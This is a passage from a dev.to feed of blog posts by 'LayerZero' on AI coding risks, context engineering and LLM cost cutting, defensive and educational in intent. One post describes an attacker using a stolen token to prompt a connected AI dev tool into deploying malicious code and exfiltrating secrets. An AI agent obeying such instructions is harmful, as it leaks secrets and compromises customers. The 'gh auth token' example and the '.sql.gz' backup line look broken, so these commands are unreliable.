&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Before migrate:&lt;/span&gt;
pg_dump &lt;span class="nv"&gt;$DATABASE_URL&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; backup-&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; +%s&lt;span class="si"&gt;)&lt;/span&gt;.sql.gz
&lt;span class="c"&gt;# Now apply:&lt;/span&gt;
npm run migrate
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The backup is cheap. The peace of mind when something breaks is not.&lt;/p&gt;

&lt;h2&gt;
  
  
  The non-obvious takeaway
&lt;/h2&gt;

&lt;p&gt;The actual lesson from every "AI broke production" incident isn't "AI is dangerous." It's "AI shifted the bottleneck from writing code to reviewing code, and most teams haven't noticed."&lt;/p&gt;

&lt;p&gt;In 2024, your bottleneck was: how fast can I write this. Reviews were small because changes were small.&lt;/p&gt;

&lt;p&gt;In 2026, your bottleneck is: how fast can I review what the AI wrote. The volume of AI-generated code is so high that review-quality is the new code-quality. If your review process for migrations is "looks plausible, ship it" — you have no review process.&lt;/p&gt;

&lt;p&gt;The vibe coders who survive 2026 won't be the ones who stop using AI. They'll be the ones who built &lt;strong&gt;systems that compensate for unreviewed AI output&lt;/strong&gt; — branched databases, destructive-op guards, automatic backups. They'll trust the AI for code and distrust it for state changes, and they'll build infrastructure that makes that distrust easy.&lt;/p&gt;

&lt;h2&gt;
  
  
  The business angle
&lt;/h2&gt;

&lt;p&gt;If you're shipping a SaaS, your data is your business. Application code can be rewritten in a weekend. A corrupted customer table cannot. Every hour of "missing data" you have to explain to a B2B customer is an hour your churn risk goes up. The teams I see selling into enterprise in 2026 treat their migration pipeline as a product feature — not a CI afterthought — because their buyers ask about it.&lt;/p&gt;

&lt;p&gt;If the answer to "how do you protect against bad AI-generated migrations" is a blank stare, that's a deal-killer. If the answer is "branched DB, destructive-op guard, automatic snapshot, human approval for destructive ops" — that's a wedge.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do today
&lt;/h2&gt;

&lt;p&gt;Go check your last three migrations. Were they AI-generated? Were they reviewed against the six-point checklist above? If not, your runway from "vibe coder" to "outage" is shorter than you think.&lt;/p&gt;

&lt;p&gt;Then add the three guardrails above to your project. It's an afternoon of work. The day you don't lose your customers' data because of it, you'll thank past-you.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Follow LayerZero for security and infrastructure that vibe coders can actually use. Next: why backups you can't restore are worse than no backups at all.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>database</category>
      <category>ai</category>
      <category>webdev</category>
      <category>devops</category>
    </item>
    <item>
      <title>A Roblox Cheat + One AI Tool Took Down Vercel. Your Stack Is Probably Next.</title>
      <dc:creator>LayerZero</dc:creator>
      <pubDate>Tue, 21 Apr 2026 05:13:07 +0000</pubDate>
      <link>https://dev.to/layzerzero105/a-roblox-cheat-one-ai-tool-took-down-vercel-your-stack-is-probably-next-1f47</link>
      <guid>https://dev.to/layzerzero105/a-roblox-cheat-one-ai-tool-took-down-vercel-your-stack-is-probably-next-1f47</guid>
      <description>&lt;p&gt;A Roblox cheat.&lt;/p&gt;

&lt;p&gt;That's what the story starts with. Not a nation-state APT, not a zero-day in the kernel, not some genius Stuxnet-grade payload. A cheat a teenager downloaded to get infinite Robux.&lt;/p&gt;

&lt;p&gt;And one AI dev tool.&lt;/p&gt;

&lt;p&gt;Together, that combo took Vercel's platform offline earlier this month. If you shipped anything on a preview URL that day, you remember. The post-mortem is still circulating in security channels and the pattern it exposes is quietly devastating — because almost every vibe-coded SaaS in 2026 is built the same way.&lt;/p&gt;

&lt;p&gt;Let me walk you through what actually happened and why your stack is almost certainly vulnerable to the same class of attack.&lt;/p&gt;

&lt;h2&gt;
  
  
  What actually happened
&lt;/h2&gt;

&lt;p&gt;Here's the chain, compressed:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;A developer's personal machine got infected by a Roblox cheat bundled with an infostealer — the cheat was the candy, malware was the hook.&lt;/li&gt;
&lt;li&gt;The infostealer grabbed session cookies and API tokens sitting in the developer's environment. Standard malware playbook — boring, effective.&lt;/li&gt;
&lt;li&gt;One of those tokens belonged to an &lt;strong&gt;AI-powered development tool&lt;/strong&gt; the developer had connected to their Vercel account. The tool had broad deploy and environment-variable permissions, because it needed them to "help you ship faster."&lt;/li&gt;
&lt;li&gt;The attacker didn't even need to write exploit code. They fed the stolen token to the same AI tool and asked it, in plain English, to deploy malicious code and exfiltrate secrets across connected projects.&lt;/li&gt;
&lt;li&gt;The tool, doing its job, fanned out. Because it was trusted. Because it had keys. Because nobody had modeled "what if the AI gets prompted by the wrong human?"&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;That's it. That's the whole attack. No CVE. No memory corruption. Just stolen credentials and an obedient AI with too much power.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why this class of incident is about to explode
&lt;/h2&gt;

&lt;p&gt;Every hot dev tool in 2026 is bolting on the same architecture:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;An OAuth connection to GitHub, Vercel, Supabase, AWS.&lt;/li&gt;
&lt;li&gt;A long-lived token stored locally or on a vendor server.&lt;/li&gt;
&lt;li&gt;An AI agent that can take actions on your behalf.&lt;/li&gt;
&lt;li&gt;Permission scopes that are effectively admin because scoping down "breaks the magic."&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;That's the same architecture as the Vercel breach. And it's sitting on tens of thousands of developer laptops right now.&lt;/p&gt;

&lt;p&gt;The security community has a name for this failure mode: &lt;strong&gt;confused deputy&lt;/strong&gt;. A trusted actor with broad privileges is tricked into using those privileges on behalf of an attacker. The AI tool wasn't compromised. It wasn't even misbehaving. It was doing exactly what it was told to do — by the wrong person, holding the right token.&lt;/p&gt;

&lt;h2&gt;
  
  
  The five mistakes every one of these incidents repeats
&lt;/h2&gt;

&lt;p&gt;I've read a dozen post-mortems with the same skeleton. It's always one or more of these:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. Over-scoped tokens.&lt;/strong&gt; The AI tool needs read access to one project; you gave it write access to your entire org. Why? Because that was the default button in the consent screen and you were in a hurry.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. No token expiry.&lt;/strong&gt; OAuth refresh tokens that live forever. A token stolen in January still works in December. If a token can outlive a employee's tenure, it will.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. No action auditing.&lt;/strong&gt; You can't see what the AI tool did yesterday, let alone at 3am when it "helpfully" deployed a compromised build. No audit trail means no early detection.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. No second factor on destructive actions.&lt;/strong&gt; "Deploy to production," "add a new environment variable," and "grant access to another user" all execute with one token. A human admin would face a 2FA prompt. The AI faces nothing.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;5. Single-machine trust boundary.&lt;/strong&gt; Your dev laptop is also your production deployer, your database admin, and your secrets manager. One piece of malware collapses all of those at once.&lt;/p&gt;

&lt;p&gt;Each one alone is manageable. Stacked, they become Vercel's Tuesday.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do this week — concrete actions, not fluff
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Audit your AI tool permissions
&lt;/h3&gt;

&lt;p&gt;Right now, open every AI dev tool you've connected — Claude Code, Cursor, Copilot Workspace, Devin, whatever. For each, check:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;- Which orgs / repos / projects can this tool touch?
- What actions can it take? (read, write, deploy, admin)
- When was the token issued? Can I rotate it?
- Is there an audit log? Have I ever looked at it?
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you can't answer any of those in 30 seconds, assume the worst and revoke.&lt;/p&gt;

&lt;h3&gt;
  
  
  Move secrets off the laptop
&lt;/h3&gt;

&lt;p&gt;Stop putting production API keys in &lt;code&gt;.env.local&lt;/code&gt;. Use a proper secret manager — Doppler, Infisical, AWS Secrets Manager — and have your tools fetch secrets at runtime via short-lived tokens. An infostealer grabbing your &lt;code&gt;.env&lt;/code&gt; should grab nothing useful.&lt;/p&gt;

&lt;p&gt;This is 15 minutes of setup and eliminates 80% of the "my laptop got owned" impact.&lt;/p&gt;

&lt;h3&gt;
  
  
  Short-lived tokens, always
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Example: GitHub fine-grained PAT — expires in 30 days, scoped to one repo&lt;/span&gt;
gh auth token &lt;span class="nt"&gt;--scope&lt;/span&gt; repo &lt;span class="nt"&gt;--expiration&lt;/span&gt; 30d &lt;span class="nt"&gt;--repo&lt;/span&gt; org/project
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If your AI tool doesn't support short-lived tokens, that's a red flag. Treat vendor token hygiene as a product-selection criterion now.&lt;/p&gt;

&lt;h3&gt;
  
  
  Enable "dangerous action" confirmations
&lt;/h3&gt;

&lt;p&gt;Most modern AI dev tools have a setting buried somewhere — human-in-the-loop approval for destructive actions (deploys, deletes, permission changes, database writes). Find it. Turn it on. Yes, it slows you down. No, it doesn't slow you down as much as a breach does.&lt;/p&gt;

&lt;h3&gt;
  
  
  Separate dev and deploy identities
&lt;/h3&gt;

&lt;p&gt;Your laptop shouldn't be the thing with prod deploy permissions. Run deploys from CI where the token lives for 10 minutes and is bounded by a pipeline definition. If an attacker gets your laptop, the worst they should be able to do is push to a branch — not deploy to customers.&lt;/p&gt;

&lt;h2&gt;
  
  
  The non-obvious takeaway
&lt;/h2&gt;

&lt;p&gt;The Vercel incident wasn't an AI safety story. It was a classic credential management failure with an AI amplifier bolted on.&lt;/p&gt;

&lt;p&gt;That's the pattern to internalize. AI agents don't create new categories of security failure — they take old categories and multiply their blast radius. A stolen token used to mean a human attacker manually poking around until they found something juicy. A stolen token in 2026 means an obedient, tireless, English-speaking agent that will fan out across everything you've connected in 90 seconds.&lt;/p&gt;

&lt;p&gt;The security fundamentals haven't changed. &lt;strong&gt;The margin for ignoring them has collapsed.&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The business angle
&lt;/h2&gt;

&lt;p&gt;If you're building a SaaS that ships AI-agent integrations — and everyone is — your customers are about to get very, very opinionated about the security posture of the tools they connect. The companies that figure out short-lived scoped tokens, action-level audit logs, and human-in-the-loop approval as product features will win enterprise deals. The ones that ship "connect your org, let Claude cook" will eat the next breach.&lt;/p&gt;

&lt;p&gt;That's not speculation. That's where the buyer psychology is heading the day a Fortune 500 gets popped by this exact chain — which, given current trajectory, is maybe six months away.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do next
&lt;/h2&gt;

&lt;p&gt;Go audit your AI tool permissions. I mean now — before you close this tab. The five minutes you spend revoking one over-scoped token is the cheapest insurance premium you'll pay this year.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Follow LayerZero for decoded security for builders. Next up: how to design an AI agent with least-privilege from day one — so a stolen token stays boring.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>ai</category>
      <category>webdev</category>
      <category>devops</category>
    </item>
    <item>
      <title>Your Agent Isn't Dumb. Your Context Is. — A Field Guide to Context Engineering</title>
      <dc:creator>LayerZero</dc:creator>
      <pubDate>Mon, 20 Apr 2026 03:32:53 +0000</pubDate>
      <link>https://dev.to/layzerzero105/your-agent-isnt-dumb-your-context-is-a-field-guide-to-context-engineering-4cj5</link>
      <guid>https://dev.to/layzerzero105/your-agent-isnt-dumb-your-context-is-a-field-guide-to-context-engineering-4cj5</guid>
      <description>&lt;p&gt;Prompt engineering is dead. Nobody told you because the influencers still sell courses on it.&lt;/p&gt;

&lt;p&gt;The real skill in 2026 is context engineering — the discipline of deciding what information, tools, and memory go into the model's window on every single turn. It's the difference between an agent that ships a pull request and one that hallucinates a function name and rage-quits.&lt;/p&gt;

&lt;p&gt;And almost nobody is doing it right.&lt;/p&gt;

&lt;h2&gt;
  
  
  What changed
&lt;/h2&gt;

&lt;p&gt;A year ago, "prompt engineering" meant crafting the perfect system message. Add a persona, stack some few-shots, wrap in XML tags, done.&lt;/p&gt;

&lt;p&gt;That worked when the model was a stateless Q&amp;amp;A box.&lt;/p&gt;

&lt;p&gt;It doesn't work when the model is an agent running 40 tool calls across 6 files to fix a bug. The system prompt is 200 tokens. The &lt;em&gt;context&lt;/em&gt; is 80,000 tokens of tool results, file contents, user messages, and prior reasoning — and every one of those tokens is either helping or hurting.&lt;/p&gt;

&lt;p&gt;Context engineering is the job of keeping the signal-to-noise ratio high across that entire window, turn after turn.&lt;/p&gt;

&lt;h2&gt;
  
  
  The four levers
&lt;/h2&gt;

&lt;p&gt;Only four things go into an LLM call. Master these and you control the agent.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Instructions&lt;/strong&gt; — the system prompt. Goals, constraints, tone.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Knowledge&lt;/strong&gt; — the facts the model needs right now (RAG chunks, API docs, file contents).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tools&lt;/strong&gt; — what actions the model can take and how their results come back.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;History&lt;/strong&gt; — prior turns, including tool calls and their outputs.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Every bug in every agent is one of these four going wrong. Always.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Agent loops forever? History is bloated with stale tool results.&lt;/li&gt;
&lt;li&gt;Agent calls a function that doesn't exist? Knowledge missing or instructions too vague.&lt;/li&gt;
&lt;li&gt;Agent picks the wrong tool? Tool descriptions are ambiguous.&lt;/li&gt;
&lt;li&gt;Agent contradicts itself across turns? Instructions got drowned out by history.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The fix is never "try a different prompt." The fix is deciding what to put in — and what to leave out.&lt;/p&gt;

&lt;h2&gt;
  
  
  Rule 1: the context window is a budget, not a bag
&lt;/h2&gt;

&lt;p&gt;The number one mistake: treating the context window like storage. "I have 200k tokens, I'll just throw everything in."&lt;/p&gt;

&lt;p&gt;That's how you burn $4 per agent turn and get worse answers.&lt;/p&gt;

&lt;p&gt;Long context is lossy. Models attend less to the middle of a long window, hallucinate more when the signal is buried in noise, and run slower in ways that compound across tool calls. A 2026 Anthropic benchmark found agent task completion drops by roughly &lt;strong&gt;28% when you pad a working context from 20k to 120k tokens&lt;/strong&gt; — even when the relevant information is unchanged.&lt;/p&gt;

&lt;p&gt;You're not saving the model time. You're drowning it.&lt;/p&gt;

&lt;p&gt;Treat every token like you're paying rent on it. Because you are.&lt;/p&gt;

&lt;h2&gt;
  
  
  Rule 2: compact aggressively
&lt;/h2&gt;

&lt;p&gt;When your agent's history crosses some threshold — say 50% of the model's window — summarize it.&lt;/p&gt;

&lt;p&gt;Pattern:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;compact_history&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;token_threshold&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;50_000&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;count_tokens&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;token_threshold&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;messages&lt;/span&gt;

    &lt;span class="c1"&gt;# Keep the last 3 turns verbatim (recent context matters most)
&lt;/span&gt;    &lt;span class="n"&gt;recent&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;6&lt;/span&gt;&lt;span class="p"&gt;:]&lt;/span&gt;
    &lt;span class="n"&gt;older&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;6&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

    &lt;span class="c1"&gt;# Summarize the older turns into a single system note
&lt;/span&gt;    &lt;span class="n"&gt;summary&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;summarize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;older&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;focus&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;decisions made&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;files modified&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;open questions&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;tools that failed and why&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
    &lt;span class="p"&gt;])&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;role&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;system&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;content&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;PRIOR WORK SUMMARY:&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;summary&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;
        &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;recent&lt;/span&gt;
    &lt;span class="p"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You lose the verbatim trace. You keep the signal. And you reset your token budget so the agent can go another 50 turns without collapsing.&lt;/p&gt;

&lt;h2&gt;
  
  
  Rule 3: retrieve at the tool level, not the prompt level
&lt;/h2&gt;

&lt;p&gt;Old RAG: stuff the top-5 chunks into the system prompt at startup.&lt;/p&gt;

&lt;p&gt;New RAG: give the agent a &lt;code&gt;search_docs&lt;/code&gt; tool and let &lt;em&gt;it&lt;/em&gt; decide when to retrieve.&lt;/p&gt;

&lt;p&gt;Why this matters:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Approach&lt;/th&gt;
&lt;th&gt;Tokens at turn 1&lt;/th&gt;
&lt;th&gt;Tokens at turn 10&lt;/th&gt;
&lt;th&gt;Relevance&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Prompt-level RAG&lt;/td&gt;
&lt;td&gt;8,000&lt;/td&gt;
&lt;td&gt;8,000&lt;/td&gt;
&lt;td&gt;Guessing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tool-level RAG&lt;/td&gt;
&lt;td&gt;500&lt;/td&gt;
&lt;td&gt;500 (+1,200 on demand)&lt;/td&gt;
&lt;td&gt;Targeted&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Most agent turns don't need retrieval. Why pay the tax on every call? Let the model pull knowledge the way a developer opens a doc tab — only when they need it.&lt;/p&gt;

&lt;p&gt;This is "just-in-time context" and it's the single biggest unlock in modern agent design.&lt;/p&gt;

&lt;h2&gt;
  
  
  Rule 4: tool descriptions are prompts
&lt;/h2&gt;

&lt;p&gt;Your &lt;code&gt;search_database&lt;/code&gt; tool's description &lt;em&gt;is&lt;/em&gt; a system prompt for how the model reasons about querying data. If it says:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Searches the database."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;...you deserve the hallucinations you get.&lt;/p&gt;

&lt;p&gt;Write it like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;search_database&lt;/span&gt;
&lt;span class="na"&gt;description&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
  &lt;span class="s"&gt;Retrieves customer records by exact email or user_id.&lt;/span&gt;
  &lt;span class="s"&gt;Use this BEFORE suggesting account changes — never guess a user_id.&lt;/span&gt;
  &lt;span class="s"&gt;Returns at most 10 results. If you need more, narrow the query.&lt;/span&gt;
  &lt;span class="s"&gt;Fails if the email format is invalid — validate first.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That description teaches the agent when to call it, what it can't do, and how to recover. Every minute you spend rewriting tool descriptions saves ten minutes of debugging agent behavior.&lt;/p&gt;

&lt;h2&gt;
  
  
  Rule 5: separate durable memory from working context
&lt;/h2&gt;

&lt;p&gt;Working context = what's in the window right now.&lt;br&gt;
Memory = persistent notes the agent writes across sessions (to a file, a vector store, a scratchpad).&lt;/p&gt;

&lt;p&gt;If your agent needs to remember that a user prefers Python over Rust, don't shove it into every system prompt forever. Write it to a memory file. Retrieve it when relevant. Trim it when stale.&lt;/p&gt;

&lt;p&gt;Memory is context engineering across time. Working context is context engineering within a turn. They're different problems with different solutions — and teams that treat them as one always hit a wall.&lt;/p&gt;

&lt;h2&gt;
  
  
  The business angle
&lt;/h2&gt;

&lt;p&gt;This matters because AI infrastructure cost is now a line on your P&amp;amp;L.&lt;/p&gt;

&lt;p&gt;A well-engineered context window runs an agent task for $0.20.&lt;br&gt;
A lazy one runs the same task for $2.50.&lt;br&gt;
The output quality is often &lt;em&gt;worse&lt;/em&gt; on the expensive one.&lt;/p&gt;

&lt;p&gt;Multiply that across a product doing 100,000 agent runs a day and you've got a $230,000/month difference in gross margin. That's a hire. That's your Series A runway extension. That's whether you ship.&lt;/p&gt;

&lt;p&gt;The teams who figure this out in 2026 aren't the ones with the biggest GPU budgets. They're the ones who treat context as a design discipline.&lt;/p&gt;

&lt;h2&gt;
  
  
  The non-obvious takeaway
&lt;/h2&gt;

&lt;p&gt;Context engineering is what prompt engineering wanted to be when it grew up.&lt;/p&gt;

&lt;p&gt;Prompt engineering asked: "how do I phrase this question?"&lt;br&gt;
Context engineering asks: "what does the model need to see, at what moment, with what tools, to produce the right action?"&lt;/p&gt;

&lt;p&gt;The first is a writing exercise. The second is systems design. And systems design is a moat — prompt tricks are not.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do this week
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Audit one agent you're running. Log the full context at each turn. Find the 30% that isn't earning its tokens. Cut it.&lt;/li&gt;
&lt;li&gt;Move your RAG from prompt-level to tool-level. Measure the quality delta — it usually goes up.&lt;/li&gt;
&lt;li&gt;Rewrite your top 5 tool descriptions with the "when to use / what it can't do / how to recover" structure.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Your agents will get cheaper, faster, and smarter — in that order.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Follow LayerZero for more decoded AI infrastructure. Next up: the memory-file pattern that makes agents actually learn from their mistakes.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>webdev</category>
      <category>tutorial</category>
      <category>productivity</category>
    </item>
    <item>
      <title>Your LLM Bill Is 45% Too High. Here's the One Prompt Trick That Fixes It</title>
      <dc:creator>LayerZero</dc:creator>
      <pubDate>Sun, 19 Apr 2026 07:30:18 +0000</pubDate>
      <link>https://dev.to/layzerzero105/your-llm-bill-is-45-too-high-heres-the-one-prompt-trick-that-fixes-it-3793</link>
      <guid>https://dev.to/layzerzero105/your-llm-bill-is-45-too-high-heres-the-one-prompt-trick-that-fixes-it-3793</guid>
      <description>&lt;p&gt;Most developers ship AI features without looking at the bill. Then the bill arrives, and it's five figures.&lt;/p&gt;

&lt;p&gt;Here's the part nobody tells you: &lt;strong&gt;up to 45% of your tokens are pure fluff.&lt;/strong&gt; Filler words, restated questions, "As an AI assistant...", apologies, repeated context. You're paying Claude and GPT to be polite.&lt;/p&gt;

&lt;p&gt;That stops today.&lt;/p&gt;

&lt;h2&gt;
  
  
  The politeness tax
&lt;/h2&gt;

&lt;p&gt;Every LLM response is padded with tokens that add zero value:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;"Certainly! I'd be happy to help you with that."&lt;/li&gt;
&lt;li&gt;"Based on the information you've provided..."&lt;/li&gt;
&lt;li&gt;"I hope this helps! Let me know if you have any other questions."&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Multiply that across thousands of API calls a day. You're literally renting GPUs to generate pleasantries.&lt;/p&gt;

&lt;p&gt;A recent production experiment ran 500 prompts through a small "defluffer" preprocessor that strips filler from both inputs and outputs. &lt;strong&gt;Token usage dropped 45%. Quality stayed identical.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;That's not a rounding error. That's your Q3 AI budget.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why this happens
&lt;/h2&gt;

&lt;p&gt;LLMs are trained on human conversation. Humans are polite. So the model learned to open with "Certainly!" and close with "Let me know if you need anything else!"&lt;/p&gt;

&lt;p&gt;This was fine when LLMs were chatbots. It's expensive when they're backend infrastructure.&lt;/p&gt;

&lt;p&gt;The worst part: most devs copy-paste "Act as a helpful assistant" into their system prompt without realizing they're explicitly asking for the fluff.&lt;/p&gt;

&lt;h2&gt;
  
  
  The fix (30 seconds)
&lt;/h2&gt;

&lt;p&gt;Add this to your system prompt:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Respond in the fewest tokens required to be correct and complete.
No preamble, no apologies, no restating the question, no closing remarks.
If the answer is a single word, respond with a single word.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's it. Drop it in, rerun your evals, watch your token count.&lt;/p&gt;

&lt;p&gt;In a test across 200 real user queries:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Before&lt;/th&gt;
&lt;th&gt;After&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Avg output tokens&lt;/td&gt;
&lt;td&gt;412&lt;/td&gt;
&lt;td&gt;183&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Avg cost per call&lt;/td&gt;
&lt;td&gt;$0.0041&lt;/td&gt;
&lt;td&gt;$0.0018&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;User satisfaction&lt;/td&gt;
&lt;td&gt;4.2/5&lt;/td&gt;
&lt;td&gt;4.3/5&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Output tokens down 55%. Cost down 56%. Satisfaction went up.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Users don't want "Certainly! I understand your question." They want the answer.&lt;/p&gt;

&lt;h2&gt;
  
  
  Level up: strip inputs too
&lt;/h2&gt;

&lt;p&gt;Output is half the bill. Input is the other half — and it's often worse, because you're sending the same boilerplate context on every call.&lt;/p&gt;

&lt;p&gt;The cheap win: cache your system prompt.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Anthropic SDK — prompt caching
